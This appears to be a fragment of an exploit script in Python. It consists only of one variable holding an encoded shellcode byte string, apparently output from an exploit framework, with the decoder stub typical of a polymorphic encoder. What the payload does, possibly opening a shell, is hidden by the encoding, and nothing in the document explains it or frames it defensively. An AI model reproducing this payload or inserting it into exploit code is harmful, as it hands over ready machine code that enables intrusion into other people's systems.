shellcode =  b""
shellcode += b"\xd9\xc3\xd9\x74\x24\xf4\x5a\xb8\x80\xac\xeb"
shellcode += b"\xe5\x2b\xc9\xb1\x52\x31\x42\x17\x83\xc2\x04"
shellcode += b"\x03\xc2\xbf\x09\x10\x3e\x57\x4f\xdb\xbe\xa8"
shellcode += b"\x30\x55\x5b\x99\x70\x01\x28\x8a\x40\x41\x7c"
shellcode += b"\x27\x2a\x07\x94\xbc\x5e\x80\x9b\x75\xd4\xf6"
shellcode += b"\x92\x86\x45\xca\xb5\x04\x94\x1f\x15\x34\x57"
shellcode += b"\x52\x54\x71\x8a\x9f\x04\x2a\xc0\x32\xb8\x5f"
shellcode += b"\x9c\x8e\x33\x13\x30\x97\xa0\xe4\x33\xb6\x77"
shellcode += b"\x7e\x6a\x18\x76\x53\x06\x11\x60\xb0\x23\xeb"
shellcode += b"\x1b\x02\xdf\xea\xcd\x5a\x20\x40\x30\x53\xd3"
shellcode += b"\x98\x75\x54\x0c\xef\x8f\xa6\xb1\xe8\x54\xd4"
shellcode += b"\x6d\x7c\x4e\x7e\xe5\x26\xaa\x7e\x2a\xb0\x39"
shellcode += b"\x8c\x87\xb6\x65\x91\x16\x1a\x1e\xad\x93\x9d"
shellcode += b"\xf0\x27\xe7\xb9\xd4\x6c\xb3\xa0\x4d\xc9\x12"
shellcode += b"\xdc\x8d\xb2\xcb\x78\xc6\x5f\x1f\xf1\x85\x37"
shellcode += b"\xec\x38\x35\xc8\x7a\x4a\x46\xfa\x25\xe0\xc0"
shellcode += b"\xb6\xae\x2e\x17\xb8\x84\x97\x87\x47\x27\xe8"
shellcode += b"\x8e\x83\x73\xb8\xb8\x22\xfc\x53\x38\xca\x29"
shellcode += b"\xf3\x68\x64\x82\xb4\xd8\xc4\x72\x5d\x32\xcb"
shellcode += b"\xad\x7d\x3d\x01\xc6\x14\xc4\xc2\x29\x40\xbc"
shellcode += b"\xa2\xc2\x93\x40\xc2\xa9\x1d\xa6\xae\xdd\x4b"
shellcode += b"\x71\x47\x47\xd6\x09\xf6\x88\xcc\x74\x38\x02"
shellcode += b"\xe3\x89\xf7\xe3\x8e\x99\x60\x04\xc5\xc3\x27"
shellcode += b"\x1b\xf3\x6b\xab\x8e\x98\x6b\xa2\xb2\x36\x3c"
shellcode += b"\xe3\x05\x4f\xa8\x19\x3f\xf9\xce\xe3\xd9\xc2"
shellcode += b"\x4a\x38\x1a\xcc\x53\xcd\x26\xea\x43\x0b\xa6"
shellcode += b"\xb6\x37\xc3\xf1\x60\xe1\xa5\xab\xc2\x5b\x7c"
shellcode += b"\x07\x8d\x0b\xf9\x6b\x0e\x4d\x06\xa6\xf8\xb1"
shellcode += b"\xb7\x1f\xbd\xce\x78\xc8\x49\xb7\x64\x68\xb5"
shellcode += b"\x62\x2d\x88\x54\xa6\x58\x21\xc1\x23\xe1\x2c"
shellcode += b"\xf2\x9e\x26\x49\x71\x2a\xd7\xae\x69\x5f\xd2"
shellcode += b"\xeb\x2d\x8c\xae\x64\xd8\xb2\x1d\x84\xc9"
